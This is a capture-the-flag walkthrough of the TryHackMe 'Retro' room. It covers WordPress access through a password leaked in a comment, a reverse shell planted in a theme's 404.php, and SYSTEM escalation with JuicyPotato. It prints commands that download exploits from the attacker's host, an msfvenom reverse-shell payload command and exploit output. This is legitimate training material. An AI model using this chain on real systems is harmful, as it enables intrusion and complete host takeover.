Tryhackme - Retro

Tryhackme – Retro

In this walk through, we will be going through the Retro room from Tryhackme. This room is rated as Hard on the platform and it consist of a Windows Box running a WordPress Blog. The objective is to enumerate the running CMS, gain initial access and perform privilege escalation to capture the root flag. So, let’s get started without any delay.

Retro

Machine Info:

TitleRetro CTF
IPaddress10.10.165.84
DifficultyHard
ObjectiveCan you time travel? If not, you might want to think about the next best thing.

Enumeration:

  • I started with my regular nmap scan with service detection however this time also specified the -Pn flag to skip the host discovery using ICMP as it is a Windows box and does not respond to that.

sudo nmap -Pn -sS -sV 10.10.165.84

nmap scan

  • As per the above scan results, we found two ports opened – 80 (HTTP) and 3389 (RDP Service). The HTTP Webserver running here is a IIS Windows Server.

Windows IIS server

  • Next, i used gobuster to perform some directory bruteforcing and found /retro directory in the results.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.165.84/ -w ~/Desktop/Wordlist/directory-small.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.165.84/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/directory-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/10/31 09:24:43 Starting gobuster in directory enumeration mode
===============================================================
/retro                (Status: 301) [Size: 149] [--> http://10.10.165.84/retro/

gobuster scan

  • Navigating to the found directory reveals a WordPress blog running on it.

Retro blog

  • As i skimmed through the application, found a comment from user Wade which as a potential password – parzival.

Wade's password

  • I further enumerated the application with wp-scan but found nothing useful. Just XMLRPC which is enabled can be further used for bruteforcing if we come up with nothing.

wpscan --url http://10.10.165.84/retro/ -e ap

Wp-scan output

Login page link

Wordpress login

  • I tried the earlier found password with the username wade and Voila! it let us in.

wade: parzival

Wordpress Dashboard

Initial Access:

  • Next i edited the 404 temlate by going into Theme Editor and then changed the contents with our reverse shell with our IP address to call back to.

404.php

  • I navigated to one of the non-existing post and it started my netcat listener. As soon as i hit on the given link, it gives me a connection back.

netcat listener

  • Once i got the initial access, i was unable to get the flags as we were restricted to the web user privileges. So, we have to perform some privilege escalation in order to be NT Authority/System on the server and access our flag files.

Privilege Escalation:

  • Next, i used the Windows Exploit Suggester script to check for known local privilege escalation exploits. For that, i feed the contents of systeminfo from our target machine to a file named systeminfo.txt and run the script on it. As per the results received, we have a couple of exploits but we will go with the first one.

wh1terose@fsociety:~/Tools/Windows-Exploit-Suggester$ python windows-exploit-suggester.py --database 2023-10-31-mssb.xls --systeminfo ~/CTF/TryHackme/retro/systeminfo.txt --ostext 'windows 10 64-bit' -l 

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] getting OS information from command line text
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits
[*] there are now 160 remaining vulns
[*] searching for local exploits only
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 10 64-bit'
[*] 
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation

-- snipped --

Windows Exploit Suggestor

  • Let’s make a temporary directory for download of our exploits.

mkdir temp

  • First download the Juicypotato exploit from your local server. I have used python to spawn a HTTP server on my local machne.

Invoke-WebRequest -Uri 'http://10.18.1.78:8000/JuicyPotato.exe' -OutFile jp.exe

Download the exploit

  • Next, i tried using Nishang powershell reverse shell and batch file to invoke it. It worked with the juicypotato exploit however does not grant me a reverse shell but now i got the CSID.

.\jp.exe -t * -p revshell.bat -l 4444

C:\temp>.\jp.exe -t * -p revshell.bat -l 4444
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Juicy potato exploit

  • So now, i generate another PHP reverse shell payload but this time using Metasploit’s msfvenom.

wh1terose@fsociety:~/CTF/TryHackme/retro$ msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=10.18.1.78 LPORT=4444 -o rev.exe

reverse shell

  • Download our generated payload to the target machine and executing it with juicypotato exploit.

Invoke-WebRequest -Uri 'http://10.18.1.78:8000/rev.exe' -OutFile rev.exe

.\jp.exe -l 4444 -p rev.exe -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

C:\temp>.\jp.exe -l 4444 -p rev.exe -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 4444
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

juicypotato exploit

  • As soon as i executed it, i received a connection back at my netcat listener.

nt authority/system

  • Got the contents of the user.txt and root.txt files.

user flag

root flag

Task 1 – Pwn

Question 1 – A web server is running on the target. What is the hidden directory which the website lives on?

Question 2 – user.txt

Question 3 – root.txt

Task 1 - Pwn

Also Read: Tryhackme – Overpass 3 (Hosting)

Conclusion:

Conclusion

So that was “Retro” for you. We first started with our regular nmap scan and found two ports opened – 80 (HTTP) and 3389 (RDP Service). Next, we fired gobuster on the web server running and found a directory named /retro which holds a WordPress blog. Within the one of the comments found password for user wade. Used it to get access to the WordPress Dashboard. Further, edited the 404.php file with our reverse shell and got our initial access. Moving on, performed enumeration with Windows Exploit Suggester and found that the windows version is vulnerable to Potato exploits. Downloaded the exploit on the system and generated a reverse shell with msfvenom. Used the exploit to get a reverse shell as NT Authority/System and captured the root flag and photos of your mom’s 5th boyfriend. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top